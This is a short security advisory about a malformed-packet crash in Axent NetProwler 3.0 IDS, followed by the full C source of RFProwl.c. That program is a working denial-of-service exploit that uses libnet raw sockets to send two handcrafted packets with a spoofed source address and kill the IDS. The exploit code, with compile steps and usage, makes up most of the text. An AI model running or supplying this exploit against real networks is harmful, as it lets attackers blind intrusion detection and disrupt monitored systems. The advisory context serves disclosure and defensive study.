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// source: https://www.securityfocus.com/bid/1225/info
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Axent NetProwler 3.0 IDS is vulnerable to a malformed packet attack. It will crash if the Man-in-the-Middle signature encounters a packet for which the following expression is true:
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(IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH
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According to Axent Security team, this is not a fragmented packet issue as reported in RFP2K05 By Rain Forest Puppy.
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In addition, NetProwler utilizes Microsoft JET engine 3.5 for storing incoming alert information. More information regarding the Microsoft JET engine 3.5 vulnerability can be found at:
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https://www.securityfocus.com/bid/286
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/* RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net
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Kills NetProwler IDS version 3.0
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You need libnet installed. It's available from
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www.packetfactory.net. Acks to route.
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Only tested on RH 6.x Linux. To compile:
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gcc RFProwl.c -lnet -o RFProwl
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Plus, make sure your architecture is defined below: */
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#define LIBNET_LIL_ENDIAN 1
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#undef LIBNET_BIG_ENDIAN 1
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#include <libnet.h>
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/* it's just much easier to code in the packet frags we want. :) */
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char pack1[]="\x45\x00"
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"\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
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"\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
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"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
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char pack2[]="\x45\x00"
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"\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
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"\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
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"\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";
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int main(int argc, char **argv) {
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int sock, c;
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u_long src_ip, dst_ip;
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printf("RFProwl - rain forest puppy / wiretrip\n");
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if(argc<3){
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printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n");
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exit(EXIT_FAILURE);}
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dst_ip=inet_addr(argv[1]);
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src_ip=inet_addr(argv[2]);
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memcpy(pack1+16,&dst_ip,4);
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memcpy(pack2+16,&dst_ip,4);
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memcpy(pack1+12,&src_ip,4);
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memcpy(pack1+12,&src_ip,4);
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sock = open_raw_sock(IPPROTO_RAW);
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if (sock == -1){
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perror("Socket problems: ");
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exit(EXIT_FAILURE);}
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c = write_ip(sock, pack1, 46);
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if (c < 46) printf("Write_ip #1 choked\n");
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c = write_ip(sock, pack2, 46);
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if (c < 46) printf("Write_ip #2 choked\n");
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printf("Packets sent\n");
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return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);} |